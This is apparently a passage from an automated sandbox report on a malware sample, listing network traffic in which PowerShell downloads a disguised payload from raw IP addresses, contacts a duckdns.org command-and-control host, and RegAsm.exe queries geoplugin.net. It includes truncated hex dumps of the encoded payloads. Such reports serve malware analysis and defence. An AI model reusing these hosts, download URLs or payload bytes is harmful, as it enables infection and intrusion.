                                                        Jul 27, 2024 13:31:31.243242025 CEST4434972034.166.62.190192.168.2.5
                                                        Jul 27, 2024 13:31:31.243283033 CEST49720443192.168.2.534.166.62.190
                                                        Jul 27, 2024 13:31:31.246840000 CEST4434972034.166.62.190192.168.2.5
                                                        Jul 27, 2024 13:31:31.246860981 CEST4434972034.166.62.190192.168.2.5
                                                        Jul 27, 2024 13:31:31.246912003 CEST49720443192.168.2.534.166.62.190
                                                        Jul 27, 2024 13:31:31.246927023 CEST4434972034.166.62.190192.168.2.5
                                                        Jul 27, 2024 13:31:31.246968031 CEST49720443192.168.2.534.166.62.190
                                                        Jul 27, 2024 13:31:31.248893976 CEST4434972034.166.62.190192.168.2.5
                                                        Jul 27, 2024 13:31:31.248944998 CEST4434972034.166.62.190192.168.2.5
                                                        Jul 27, 2024 13:31:31.248949051 CEST49720443192.168.2.534.166.62.190
                                                        Jul 27, 2024 13:31:31.248965025 CEST4434972034.166.62.190192.168.2.5
                                                        Jul 27, 2024 13:31:31.248990059 CEST4434972034.166.62.190192.168.2.5
                                                        Jul 27, 2024 13:31:31.249006033 CEST49720443192.168.2.534.166.62.190
                                                        Jul 27, 2024 13:31:31.249023914 CEST49720443192.168.2.534.166.62.190
                                                        Jul 27, 2024 13:31:31.249315977 CEST49720443192.168.2.534.166.62.190
                                                        Jul 27, 2024 13:31:38.437083006 CEST5748449706192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:38.439210892 CEST4970657484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:38.444314957 CEST5748449706192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:32:08.461842060 CEST5748449706192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:32:08.483849049 CEST4970657484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:32:08.492001057 CEST5748449706192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:32:38.485090017 CEST5748449706192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:32:38.493261099 CEST4970657484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:32:38.499980927 CEST5748449706192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:32:55.428411007 CEST4970980192.168.2.5178.237.33.50
                                                        Jul 27, 2024 13:32:55.818618059 CEST4970980192.168.2.5178.237.33.50
                                                        Jul 27, 2024 13:32:56.521739960 CEST4970980192.168.2.5178.237.33.50
                                                        Jul 27, 2024 13:32:57.818531036 CEST4970980192.168.2.5178.237.33.50
                                                        Jul 27, 2024 13:33:00.318492889 CEST4970980192.168.2.5178.237.33.50
                                                        Jul 27, 2024 13:33:05.209115028 CEST4970980192.168.2.5178.237.33.50
                                                        Jul 27, 2024 13:33:08.503058910 CEST5748449706192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:33:08.503493071 CEST4970657484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:33:08.508512974 CEST5748449706192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:33:14.818490982 CEST4970980192.168.2.5178.237.33.50

                                                        UDP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Jul 27, 2024 13:31:03.157716036 CEST5762053192.168.2.51.1.1.1
                                                        Jul 27, 2024 13:31:03.284212112 CEST53576201.1.1.1192.168.2.5
                                                        Jul 27, 2024 13:31:05.440296888 CEST5012053192.168.2.51.1.1.1
                                                        Jul 27, 2024 13:31:05.450071096 CEST53501201.1.1.1192.168.2.5
                                                        Jul 27, 2024 13:31:14.016772032 CEST5373653192.168.2.51.1.1.1
                                                        Jul 27, 2024 13:31:14.106105089 CEST53537361.1.1.1192.168.2.5
                                                        Jul 27, 2024 13:31:28.852485895 CEST6289053192.168.2.51.1.1.1
                                                        Jul 27, 2024 13:31:29.029608965 CEST53628901.1.1.1192.168.2.5

                                                        DNS Queries

                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                        Jul 27, 2024 13:31:03.157716036 CEST192.168.2.51.1.1.10x8100Standard query (0)iwarsut775laudrye2.duckdns.orgA (IP address)IN (0x0001)false
                                                        Jul 27, 2024 13:31:05.440296888 CEST192.168.2.51.1.1.10xf6e8Standard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                        Jul 27, 2024 13:31:14.016772032 CEST192.168.2.51.1.1.10x4764Standard query (0)asociatiatraditiimaria.roA (IP address)IN (0x0001)false
                                                        Jul 27, 2024 13:31:28.852485895 CEST192.168.2.51.1.1.10xd34fStandard query (0)new.quranushaiqer.org.saA (IP address)IN (0x0001)false

                                                        DNS Answers

                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        Jul 27, 2024 13:31:03.284212112 CEST1.1.1.1192.168.2.50x8100No error (0)iwarsut775laudrye2.duckdns.org192.253.251.227A (IP address)IN (0x0001)false
                                                        Jul 27, 2024 13:31:05.450071096 CEST1.1.1.1192.168.2.50xf6e8No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                        Jul 27, 2024 13:31:09.411062956 CEST1.1.1.1192.168.2.50x5ce1No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                        Jul 27, 2024 13:31:09.411062956 CEST1.1.1.1192.168.2.50x5ce1No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                        Jul 27, 2024 13:31:14.106105089 CEST1.1.1.1192.168.2.50x4764No error (0)asociatiatraditiimaria.ro93.113.54.56A (IP address)IN (0x0001)false
                                                        Jul 27, 2024 13:31:29.029608965 CEST1.1.1.1192.168.2.50xd34fNo error (0)new.quranushaiqer.org.sa34.166.62.190A (IP address)IN (0x0001)false

                                                        HTTP Request Dependency Graph

                                                        • asociatiatraditiimaria.ro
                                                        • new.quranushaiqer.org.sa
                                                        • 198.46.176.133
                                                        • 104.168.45.34
                                                        • geoplugin.net

                                                        HTTP Packets

                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.549704198.46.176.133804432C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        TimestampBytes transferredDirectionData
                                                        Jul 27, 2024 13:30:59.260989904 CEST79OUTGET /Upload/vbs.jpeg HTTP/1.1
                                                        Host: 198.46.176.133
                                                        Connection: Keep-Alive
                                                        Jul 27, 2024 13:30:59.798891068 CEST1236INHTTP/1.1 200 OK
                                                        Date: Sat, 27 Jul 2024 11:30:59 GMT
                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                        Last-Modified: Wed, 10 Jul 2024 11:19:54 GMT
                                                        ETag: "1d7285-61ce2d35c4b0c"
                                                        Accept-Ranges: bytes
                                                        Content-Length: 1929861
                                                        Keep-Alive: timeout=5, max=100
                                                        Connection: Keep-Alive
                                                        Content-Type: image/jpeg
                                                        Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1 d1 52 62 f0 15 72 82 92 e1 24 33 a2 b2 d2 f1 16 43 53 c2 08 34 63 17 25 35 36 73 93 e2 26 44 83 54 74 b3 c3 18 a3 d3 ff c4 00 14 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff c4 00 14 11 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                        Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#BRbr$3CS4c%56s&DTt?~5*sRM9RWhco#4q7[B6v^Tgc"TY_xWeXBX50xFs,/*Qcq2lyoT^=ofRGZ>(O5ceu;XG8s!u_.?,~XW!?$[8j=>gA>jz[WX)jO:q3n3VmmPo.TzccJAV9gp4;p7!vS~B]b#vo.%6i!?5<IOK~klm(=B*,xGU5Pay'rErv^uYt7*0ur$UxA-OF9>uI^O^gy4A
                                                        Jul 27, 2024 13:30:59.798913002 CEST1236INData Raw: 70 9b 99 a5 de dc d9 e7 e1 ce 43 2e e2 4a 8e 39 fe 78 02 c9 15 df 24 ae de 08 e7 2c 17 69 24 8e 7b 60 55 94 81 c7 4c a8 bb e3 ae 15 ce e5 07 b6 50 29 ea 0d 60 10 48 c8 01 dc 6f b8 39 7f 3d ea fd 23 e0 3b e0 36 37 b7 d7 2c 8b 66 89 a0 d8 06 67 04
                                                        Data Ascii: pC.J9x$,i${`ULP)`Ho9=#;67,fg+{NmXm2CS(+"]meHR87j(3N{d"a``QX;e0`Y8l`XLOn{eXadN(ma]pQrXpIJI:
                                                        Jul 27, 2024 13:30:59.798928022 CEST1236INData Raw: 63 4c e9 0c 70 5c 60 8b 36 0f cc 64 96 29 a7 24 a9 e9 db 04 b1 2c ba 65 63 a8 00 29 e4 1e d8 02 dc fe 71 28 36 96 3e 9e 68 01 7c 65 b5 29 32 1b 96 cb 29 da 5b 75 f3 d7 0f f7 64 91 77 19 d5 52 bd 3c 65 9a 04 3a 32 ad 39 dc be aa 2b d7 e5 80 9c 9a
                                                        Data Ascii: cLp\`6d)$,ec)q(6>h|e)2)[udwR<e:29+,AOQlAy1H=h?K.TMKxajg$jkV1SG*A13E0DoE~52>)X5OnFQM*uQMVy#o\>5$0!\DYX`
                                                        Jul 27, 2024 13:30:59.798964977 CEST1236INData Raw: eb 61 9b 1b 8e 59 08 20 77 ef 81 b5 2f 89 15 06 c9 2d 5c 6d c4 1f 54 e1 fc c6 72 37 71 4c 7a fc b1 32 69 85 9d cc 4f 37 99 5a ed 73 b7 89 69 f4 b6 41 17 25 1f 6e 47 18 1b 52 eb 3f 7b cf 4f 7c 13 6a 06 e0 43 7d 31 39 81 65 b0 7b e5 51 59 85 12 70
                                                        Data Ascii: aY w/-\mTr7qLz2iO7ZsiA%nGR?{O|jC}19e{QYpXjp,GW$Uq^BV@.P{;0k`o`YMItwC$eE+0xfJ.NyW,sEui`/eh?OQQ#y1XOO5A`1-W(=+ED
                                                        Jul 27, 2024 13:30:59.799156904 CEST1236INData Raw: 57 5c 80 2a 60 74 ef 64 8b 00 03 63 8e 98 1e 82 09 cb 79 72 9a da 0d d1 1c e0 55 27 3a a2 c1 88 8d 89 24 5f e9 81 f0 fd e8 19 a5 05 a4 6e 83 fc 39 a0 a4 35 58 1f 2b c0 4b 59 a2 d2 95 f3 59 5c 16 34 0a 11 c6 66 a4 fa 8d 1b 95 0c 5e 26 fe 12 6c 30
                                                        Data Ascii: W\*`tdcyrU':$_n95X+KYY\4f^&l0*8<KHSQ7Y3&S\p)3v'r:/>2HPscb.F$e%*z*IMJ.D7}##H ml6fm"7LyF
                                                        Jul 27, 2024 13:30:59.799171925 CEST1236INData Raw: 06 4f 0b d1 be 96 3d 34 91 ab 2a 0a 56 dd 44 fc 6f df 03 c5 b9 32 29 42 6c d7 5a ba c1 4e ab b5 4a a6 c2 a2 98 ef 27 77 c6 b3 d1 ff 00 f0 c7 fd a9 48 d4 a9 80 9b 60 45 30 1f 0c 3e a7 c1 f4 d0 68 e6 54 49 5c b0 f4 95 50 cc be d5 df ae 07 8f 50 c6
                                                        Data Ascii: O=4*VDo2)BlZNJ'wH`E0>hTI\PP@"c4J22)Fpc,i^Hm4q`w12>8miUnq`f7m(/=EDZ}=>G7'BfHH8iV;B?{<i3nYvb}<
                                                        Jul 27, 2024 13:30:59.799185991 CEST1236INData Raw: 0d 34 6e c8 f4 ec 25 2c 79 da 45 d0 fc ab 03 61 20 d3 6d dd b1 16 bd 94 56 56 5d 3e 92 65 37 1a 5d 75 0b 99 9a 6d 43 a4 c1 0e 9a c9 dc 4b 95 da c3 9e e7 f8 b1 d9 4b ad 3a 00 3e 7d 30 31 fc 69 61 85 16 38 c2 07 2d b8 ed 51 d2 b1 3d 0a 22 d3 b9 a2
                                                        Data Ascii: 4n%,yEa mVV]>e7]umCKK:>}01ia8-Q="O_!;jzEcn'J]h0T5xr]UC*K)\Foi2(3++GE/&8eU[:dW)V?L(D(E7,h$`c}f )*nsgS
                                                        Jul 27, 2024 13:30:59.799300909 CEST1236INData Raw: 47 2d be 6b bb a0 06 3f 04 cd 0a 82 f0 2c 8a dc 0d d8 1e b9 be da e9 18 d7 95 29 3d bd 57 94 7f b7 3a 54 50 7e eb 2b 3d 55 93 9e 6a 2d 56 9b 54 ac 53 49 12 95 34 48 26 ef 17 95 d7 cc 56 11 2f c4 73 c6 07 a8 9b ed f6 8a 14 2c 74 ce 1a ba 6e ac cb
                                                        Data Ascii: G-k?,)=W:TP~+=Uj-VTSI4H&V/s,tnK MCsnk}0i>?3_cFi7AlSxtQMFzxYl``sA#~j9}$j}0=pk`ESqHx1>~M.#z_
                                                        Jul 27, 2024 13:30:59.799315929 CEST1236INData Raw: 3a 99 d6 dd ca ee 08 39 b5 20 96 f8 90 cc 09 cc fd 27 88 be 9f 49 a9 63 23 22 95 65 76 50 3d 41 81 1b 78 17 54 4e 01 24 f0 ff 00 0e d2 6b df 67 87 4a 49 a8 80 91 1e 22 24 60 76 95 2c c7 72 fa 4f 2d 5d af a9 cf 36 f3 69 54 ca 93 c3 b9 dc ee 49 76
                                                        Data Ascii: :9 'Ic#"evP=AxTN$kgJI"$`v,rO-]6iTIv14jpIF.UbX$Yi|*QUB81k}w1"eP}0cQ!K*AN=5; oVuvH[J}I#k&>$"d)v
                                                        Jul 27, 2024 13:30:59.799330950 CEST1236INData Raw: e0 67 6d c5 09 50 73 52 24 48 68 f9 44 b3 77 1d f0 00 be 1c 8d 09 7d c4 1b e9 8e 26 91 5f 44 04 67 d4 3a 7b 93 f1 cd 08 d0 08 8b 88 5b 81 7c f7 39 63 ab 54 8e 35 8e 05 5e 79 38 19 51 46 9a 92 f1 3a 95 65 50 2c 71 cd f2 79 c1 6a 22 68 11 63 0d 61
                                                        Data Ascii: gmPsR$HhDw}&_Dg:{[|9cT5^y8QF:eP,qyj"hca]4hv!)Q#=qr%N'IG[u{AMB<!lsR>C!6yx$XjO~k !<=o4s$,fYz,q*t*Ux+,NG*)UeUe
                                                        Jul 27, 2024 13:30:59.803849936 CEST1236INData Raw: 1d bc 4e 78 3c 18 cf 20 06 49 5b 6c 6b 5c 02 6e b9 f6 eb 87 9f 4d e2 6d 0f 99 0e b8 34 86 ed 55 56 af b8 07 03 40 09 37 72 48 f6 ac 29 91 c8 0c c0 0a 1c 57 7f 9e 23 e1 52 6a df 4b bf 56 de b2 68 02 a0 1f 6e d8 fb 80 c4 03 db 03 cc 78 9c 1a d8 b5
                                                        Data Ascii: Nx< I[lk\nMm4UV@7rH)W#RjKVhnxZ$T}&6FhQ&2+eEqv<G+ZGO!"=y#_o^m Pq.by/Dh-6q'@4)*}eb-G=\r(,}if,


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        1192.168.2.549705104.168.45.34804432C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        TimestampBytes transferredDirectionData
                                                        Jul 27, 2024 13:31:01.665900946 CEST74OUTGET /59/LMTS.txt HTTP/1.1
                                                        Host: 104.168.45.34
                                                        Connection: Keep-Alive
                                                        Jul 27, 2024 13:31:02.168703079 CEST1236INHTTP/1.1 200 OK
                                                        Date: Sat, 27 Jul 2024 11:31:02 GMT
                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                        Last-Modified: Fri, 26 Jul 2024 06:12:52 GMT
                                                        ETag: "a1000-61e2066c262fd"
                                                        Accept-Ranges: bytes
                                                        Content-Length: 659456
                                                        Keep-Alive: timeout=5, max=100
                                                        Connection: Keep-Alive
                                                        Content-Type: text/plain
                                                        Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 38 67 4b 50 49 79 44 62 38 77 45 50 73 77 44 43 37 77 2f 4f 63 76 44 73 37 51 35 4f 30 74 44 56 37 41 7a 4f 51 6f 44 37 36 77 73 4f 73 71 44 6a 36 77 6d 4f 45 70 44 4b 36 41 68 4f 49 6f 44 42 36 41 51 4f 38 6e 44 2b 35 51 66 4f 67 4f 44 4e 7a 41 6a 4d 6b 4b 44 6f 79 51 6f 4d 41 4b 44 66 79 41 6e 4d 59 4a 44 53 79 67 6a 4d 6f 49 44 47 78 67 65 4d 59 48 44 31 78 41 64 4d 4d 48 44 79 78 51 63 4d 41 48 44 76 78 67 62 4d 73 47 44 71 78 51 61 4d 67 47 44 6e 78 67 5a 4d 55 47 44 6b 78 77 59 4d 49 47 44 65 78 51 58 4d 77 42 41 41 41 77 49 41 48 41 42 41 41 41 67 50 6b 36 44 6b 2b 67 6f 50 30 35 44 62 2b 51 6d 50 63 35 44 57 2b 41 6c 50 38 34 44 4e 2b 41 69 50 59 34 44 45 2b 67 67 50 45 34 44 41 39 77 66 50 34 33 44 38 39 77 65 50 6b 33 44 30 39 67 63 50 30 32 44 72 39 51 61 50 63 32 44 65 39 41 [TRUNCATED]
                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA8gKPIyDb8wEPswDC7w/OcvDs7Q5O0tDV7AzOQoD76wsOsqDj6wmOEpDK6AhOIoDB6AQO8nD+5QfOgODNzAjMkKDoyQoMAKDfyAnMYJDSygjMoIDGxgeMYHD1xAdMMHDyxQcMAHDvxgbMsGDqxQaMgGDnxgZMUGDkxwYMIGDexQXMwBAAAwIAHABAAAgPk6Dk+goP05Db+QmPc5DW+AlP84DN+AiPY4DE+ggPE4DA9wfP43D89wePk3D09gcP02Dr9QaPc2De9AXPo1DZ9gUPo0DJ9gAPozDy8gKPIyDa8gEPowDC7g+OIvDq7g4OotDS7gyOIoD66gsOoqDi6gmOIpDK6QiOIkD65gcOomDi5wWOolDY5AUOgkDA4AOOAjDo4AIOghDQ4ACOEcD+3g9N4eDm3g3NYdDO3ghN4bD52wtNYbD02gsNAbDv2ApNIaDf2glNIZDR2giNkYDD2ggNAUD51AeNYXDp1gZN4VDb1AUNsUDJ1ASNcUDF1wQNEQD80gONkTD40gNNQTDy0QLNsSDm0AJNMSDi0AIN4RDc0wFNURDU0gENARDO0QDNYQDFzw/MsPDuzA7MkODlzA2MYNDTzwzMIMDAyQvMkLDsygqMcKDjyglMQJDRyQjMAED+xweMcHDqxAaMUGDhxAVMIFDPxwCM4DD8wQOMcDD1wAKMYCDjwQIM8BDSwAEM0ADLwQCAAEAkAYA4AAAA/A/Po/D3/w8PY+Dk/Q4P09DQ/gzPs8DH/wgP47Dt+wqPg6Dk+AoPs5DK+AiPU4DB9AdPInDe5AWOYlDV5AVOAlDP5wSOUkDD5gQOEkDA4wPO4jD64QOOUjDv4QLOwiDr4
                                                        Jul 27, 2024 13:31:02.168751955 CEST1236INData Raw: 67 4b 4f 6b 69 44 6f 34 41 4a 4f 4d 69 44 66 34 51 47 4f 63 68 44 57 34 51 46 4f 51 68 44 54 34 77 44 4f 34 67 44 4b 34 41 42 4f 49 67 44 42 34 41 77 4e 38 66 44 2b 33 67 2b 4e 6b 66 44 31 33 77 37 4e 30 65 44 73 33 77 36 4e 63 65 44 6d 33 67 34
                                                        Data Ascii: gKOkiDo4AJOMiDf4QGOchDW4QFOQhDT4wDO4gDK4ABOIgDB4AwN8fD+3g+NkfD13w7N0eDs3w6NceDm3g4NEeDd3w1NUdDU3A0NocDI3wxNYcDF3QgNsbD62AtNIbDx2AsN8aDu2gqNkaDl2wnN0ZDc2AmNcZDT2QjNsYDK2QiNUYDE2AQNoXD41wdNYXD11QcNAXDs1gZNQWDj1gYNEWDd1AXNgVDS1AUN8UDO1gSNkUDF0wPN
                                                        Jul 27, 2024 13:31:02.168787003 CEST1236INData Raw: 78 44 52 38 77 44 50 30 77 44 4c 38 51 43 50 63 77 44 46 38 77 41 50 45 73 44 2f 37 51 2f 4f 73 76 44 35 37 77 39 4f 55 76 44 7a 37 51 38 4f 38 75 44 74 37 77 36 4f 6b 75 44 6e 37 51 35 4f 4d 75 44 68 37 77 33 4f 30 74 44 62 37 51 32 4f 63 74 44
                                                        Data Ascii: xDR8wDP0wDL8QCPcwDF8wAPEsD/7Q/OsvD57w9OUvDz7Q8O8uDt7w6OkuDn7Q5OMuDh7w3O0tDb7Q2OctDV7w0OEtDP7QzOssDJ7wxOUsDD7QgO8rD96wuOkrD36QtOMrDx6wrO0qDr6QqOcqDl6woOEqDf6QnOspDZ6wlOUpDT6QkO8oDN6wiOkoDH6QhOMoDB5wfO0nD75QeOcnD15wcOEnDv5QbOsmDp5wZOUmDj5QYO8lDd
                                                        Jul 27, 2024 13:31:02.168829918 CEST1236INData Raw: 77 77 4f 49 41 41 41 41 41 4f 41 46 41 4f 41 41 41 41 4e 55 53 44 6b 30 77 49 4e 49 53 44 68 30 41 49 4e 38 52 44 65 30 51 48 4e 77 52 44 62 30 67 47 4e 6b 52 44 59 30 77 46 4e 59 52 44 55 30 77 45 4e 49 52 44 52 30 41 45 4e 38 51 44 4e 30 67 43
                                                        Data Ascii: wwOIAAAAAOAFAOAAAANUSDk0wINISDh0AIN8RDe0QHNwRDb0gGNkRDY0wFNYRDU0wENIRDR0AEN8QDN0gCNkQDI0wBNYQDF0ABNMQDB0AwM8PD+zQ/MwPD7zg+MgPD2AAAAcBQBQDgOsrD66QuOgrD36gtOUrD06wsOIrDx6AsO8qDu6QrOwqDr6gqOkqDo6wpOYqDl6ApOMqDi6QoOAqDf6gnO0pDc6wmOopDZ6AmOcpDW6QlO
                                                        Jul 27, 2024 13:31:02.168941975 CEST896INData Raw: 79 44 6a 38 51 49 50 38 78 44 64 38 77 47 50 6b 78 44 58 38 51 46 50 4d 78 44 52 38 77 44 50 30 77 44 4c 38 51 43 50 63 77 44 46 38 77 41 50 45 73 44 2f 37 51 2f 4f 73 76 44 35 37 77 39 4f 55 76 44 7a 37 51 38 4f 38 75 44 74 37 77 36 4f 6b 75 44
                                                        Data Ascii: yDj8QIP8xDd8wGPkxDX8QFPMxDR8wDP0wDL8QCPcwDF8wAPEsD/7Q/OsvD57w9OUvDz7Q8O8uDt7w6OkuDn7Q5OMuDh7w3O0tDb7Q2OctDV7w0OEtDP7QzOssDJ7wxOUsDD7QgO8rD96wuOkrD36QtOMrDx6wrO0qDr6QqOcqDl6woOEqDf6QnOspDZ6wlOUpDT6QkO8oDN6wiOkoDH6QhOMoDB5wfO0nD75QeOcnD15wcOEnDv
                                                        Jul 27, 2024 13:31:02.168975115 CEST1236INData Raw: 59 44 48 32 67 68 4e 55 59 44 45 32 77 67 4e 49 55 44 2f 31 67 66 4e 30 58 44 38 31 77 65 4e 6f 58 44 35 31 41 65 4e 63 58 44 32 31 51 64 4e 51 58 44 7a 31 67 63 4e 45 58 44 77 31 77 62 4e 34 57 44 74 31 41 62 4e 73 57 44 71 31 51 61 4e 67 57 44
                                                        Data Ascii: YDH2ghNUYDE2wgNIUD/1gfN0XD81weNoXD51AeNcXD21QdNQXDz1gcNEXDw1wbN4WDt1AbNsWDq1QaNgWDn1gZNUWDk1wYNIWDh1AYN8VDe1QXNwVDb1gWNkVDY1wVNYVDV1AVNMVDS1QUNAVDP1gTN0UDM1wSNoUDJ1ASNcUDG1QRNQUDD1gQNEQD/AAQAwBQBQCQMsFjYxgVMOFDRxoTMwEjJxwRMSEDCw4PM0Dj6wAOMWDDz
                                                        Jul 27, 2024 13:31:02.169008017 CEST1236INData Raw: 41 57 4e 4f 56 44 50 31 6f 53 4e 59 51 44 31 30 41 4d 4e 77 52 54 61 30 34 43 4e 59 4d 6a 35 7a 6f 39 4d 72 4f 6a 6e 7a 41 32 4d 2f 4d 54 4e 7a 49 69 4d 34 4c 7a 37 79 67 75 4d 6d 4b 7a 6e 79 55 6d 4d 50 4a 44 4f 79 45 6a 4d 49 49 44 41 78 4d 65
                                                        Data Ascii: AWNOVDP1oSNYQD10AMNwRTa04CNYMj5zo9MrOjnzA2M/MTNzIiM4Lz7yguMmKznyUmMPJDOyEjMIIDAxMeMVHjxxYYMsBAAAwHAFAAA/Q1Pm4T++cuPP7jx+kUPC2za94VPR1DR9MAP2zz78gOPhzDZ8kFP7wDF7I/OHvzk782OgtjV78kOypjH4gHOScDV3Y0NzczK30hNWbTy2UrNjazO1kdNgUDG1oAN5TD70EONhSDj0gHN
                                                        Jul 27, 2024 13:31:02.169040918 CEST1236INData Raw: 50 54 38 7a 63 2b 4d 67 50 54 30 7a 73 38 4d 45 50 54 75 79 30 6a 4d 79 45 6a 30 78 6f 58 4d 30 46 6a 62 78 73 56 4d 4e 46 54 52 78 34 53 4d 6b 45 54 47 78 4d 52 4d 4f 41 54 36 77 41 4f 4d 38 43 44 74 77 55 48 4d 74 42 44 4c 77 45 43 41 41 41 41
                                                        Data Ascii: PT8zc+MgPT0zs8MEPTuy0jMyEj0xoXM0FjbxsVMNFTRx4SMkETGxMRMOAT6wAOM8CDtwUHMtBDLwECAAAAnAQAkAAAA/48PI/TY/k1PL9zQ/ozPx8TK/EyPZ8jD+wvP07D6+AuPX7jz+YsP+6jt+4qPh6Tl+0oPP5zI9cfPQ3jy9QcP+2jt9IbPn2Dm9wYP71zb90VP50jK9wBP6zT98APPczT08wLPvyDp8UHPXxjU80EPCxjJ
                                                        Jul 27, 2024 13:31:02.169074059 CEST1236INData Raw: 4d 49 4e 39 52 7a 64 30 30 47 4e 5a 51 54 42 7a 38 2f 4d 74 50 54 72 7a 49 35 4d 41 4f 7a 62 7a 59 32 4d 63 4e 44 56 7a 49 6b 4d 36 4c 54 38 79 38 74 4d 59 4c 6a 62 79 30 6c 4d 59 4a 44 54 79 63 6b 4d 30 49 44 4b 79 45 69 4d 4b 45 44 39 78 34 64
                                                        Data Ascii: MIN9Rzd00GNZQTBz8/MtPTrzI5MAOzbzY2McNDVzIkM6LT8y8tMYLjby0lMYJDTyckM0IDKyEiMKED9x4dMPHznxgWMSBjHAAAA0CABwAAAA8T7/I+PH/zo/c4P15zT+EjPT0jz8QOPXzzx8oLPCsjw7A7OjuDm7Q3OEtzN70hOyqjc48MO6aTv2wVNSXDi1MXNZQjxzkrMbLDuygYM3BAAAgFAEACA7MxNFfDq3YlNwXD21sBN
                                                        Jul 27, 2024 13:31:02.169109106 CEST1236INData Raw: 77 44 49 38 73 78 4f 57 76 44 67 37 77 33 4f 34 74 44 64 37 38 32 4f 6f 74 54 4d 35 4d 59 4f 31 6c 7a 56 35 51 6b 4e 73 61 44 71 32 51 71 4e 67 61 7a 6d 32 59 6c 4e 41 55 44 2f 31 67 66 4e 30 58 7a 37 31 67 65 4e 78 53 7a 41 7a 55 2f 4d 58 50 44
                                                        Data Ascii: wDI8sxOWvDg7w3O4tDd782OotTM5MYO1lzV5QkNsaDq2QqNgazm2YlNAUD/1gfN0Xz71geNxSzAzU/MXPDxzcgMELjvy4qMFKDXyYjMUIjDyAQM7HT9x8eMpHD5x4dMYHj0x0cMHHTwxsbM2GDsxoaMkGznxkZMTGTjxgYMCGDfxYXMxFzaxUWMfFjWxQVMOFDSxMUM9EzNxETMsEjJxASMaETFx8QMJEzAw4PM4Dj8wwOMnDT4
                                                        Jul 27, 2024 13:31:02.175251961 CEST1236INData Raw: 77 73 4d 47 4c 54 75 78 4d 65 4d 5a 48 7a 7a 78 55 63 4d 37 47 54 74 41 41 51 41 6b 41 77 41 41 42 67 50 4c 32 44 35 39 6b 45 50 6f 79 54 46 37 49 6f 4f 76 72 6a 58 34 4d 48 4f 68 68 7a 53 34 51 78 4e 32 66 7a 32 33 63 37 4e 67 65 7a 67 33 73 48
                                                        Data Ascii: wsMGLTuxMeMZHzzxUcM7GTtAAQAkAwAABgPL2D59kEPoyTF7IoOvrjX4MHOhhzS4QxN2fz23c7Ngezg3sHAAAALAMAMA4z7+otPF7TbzU6MWBAAAQBADACAyAoMwBAAAwAADABA+UpP/5Ta+wCAAAAEAMAAAAAAwwLMtCDnw4HMvBAAAQBACAPAAAwNofzx3U7NmeDgAAAAUAgAQDwMjOjdAAAAMAgAADwOysjJ7ggOjrDz6sWO


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        2192.168.2.549709178.237.33.50805684C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Jul 27, 2024 13:31:05.460515022 CEST71OUTGET /json.gp HTTP/1.1
                                                        Host: geoplugin.net
                                                        Cache-Control: no-cache
                                                        Jul 27, 2024 13:31:06.094608068 CEST1170INHTTP/1.1 200 OK
                                                        date: Sat, 27 Jul 2024 11:31:05 GMT
                                                        server: Apache
                                                        content-length: 962
                                                        content-type: application/json; charset=utf-8
